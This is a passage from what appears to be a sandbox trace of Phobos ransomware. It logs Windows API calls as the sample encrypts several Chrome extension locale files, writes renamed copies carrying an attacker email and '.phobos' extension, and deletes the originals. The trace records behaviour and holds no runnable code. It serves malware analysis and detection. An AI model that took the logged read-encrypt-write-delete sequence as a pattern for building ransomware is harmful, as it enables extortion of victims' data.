hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.824] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.824] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3f45, lpOverlapped=0x0) returned 1 [0164.827] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f50, dwBufLen=0x3f50 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3f50) returned 1 [0164.827] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3f50, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3f50, lpOverlapped=0x0) returned 1 [0164.828] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.828] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.828] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.828] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.828] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.828] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.828] CloseHandle (hObject=0x134) returned 1 [0164.828] CloseHandle (hObject=0x17c) returned 1 [0164.828] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json")) returned 1 [0164.829] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.829] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.830] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16343) returned 1 [0164.830] CloseHandle (hObject=0x17c) returned 1 [0164.830] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json")) returned 0x2020 [0164.830] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.830] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.830] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.830] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.831] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.831] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.831] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3fd7, lpOverlapped=0x0) returned 1 [0164.859] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0, dwBufLen=0x3fe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0) returned 1 [0164.860] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3fe0, lpOverlapped=0x0) returned 1 [0164.861] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.861] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.861] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.861] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.861] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.861] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.861] CloseHandle (hObject=0x17c) returned 1 [0164.861] CloseHandle (hObject=0x134) returned 1 [0164.861] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pl\\messages.json")) returned 1 [0164.862] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.863] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16348) returned 1 [0164.863] CloseHandle (hObject=0x134) returned 1 [0164.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json")) returned 0x2020 [0164.863] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.863] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.863] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.864] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.864] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.864] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3fdc, lpOverlapped=0x0) returned 1 [0164.865] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0, dwBufLen=0x3fe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0) returned 1 [0164.865] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3fe0, lpOverlapped=0x0) returned 1 [0164.868] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.868] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.868] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.868] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.868] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.868] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.868] CloseHandle (hObject=0x134) returned 1 [0164.869] CloseHandle (hObject=0x17c) returned 1 [0164.869] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt\\messages.json")) returned 1 [0164.869] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.869] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.870] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16348) returned 1 [0164.870] CloseHandle (hObject=0x17c) returned 1 [0164.870] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json")) returned 0x2020 [0164.870] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.870] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.870] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.870] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.871] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.871] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.871] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3fdc, lpOverlapped=0x0) returned 1 [0164.892] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0, dwBufLen=0x3fe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0) returned 1 [0164.892] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3fe0, lpOverlapped=0x0) returned 1 [0164.893] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.893] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.893] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.893] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.893] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.893] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.893] CloseHandle (hObject=0x17c) returned 1 [0164.893] CloseHandle (hObject=0x134) returned 1 [0164.893] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_BR\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_br\\messages.json")) returned 1 [0164.894] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.894] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.894] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16348) returned 1 [0164.895] CloseHandle (hObject=0x134) returned 1 [0164.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json")) returned 0x2020 [0164.895] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.895] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.895] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_PT\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\pt_pt\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.895] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.895] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.895] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3fdc, lpOverlapped=0x0) returned 1 [0165.008] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0, dwBufLen=0x3fe0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3fe0) returned 1 [0165.008] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3fe0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3fe0, lpOverlapped=0x0) returned 1 [0165.009] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0165.009] 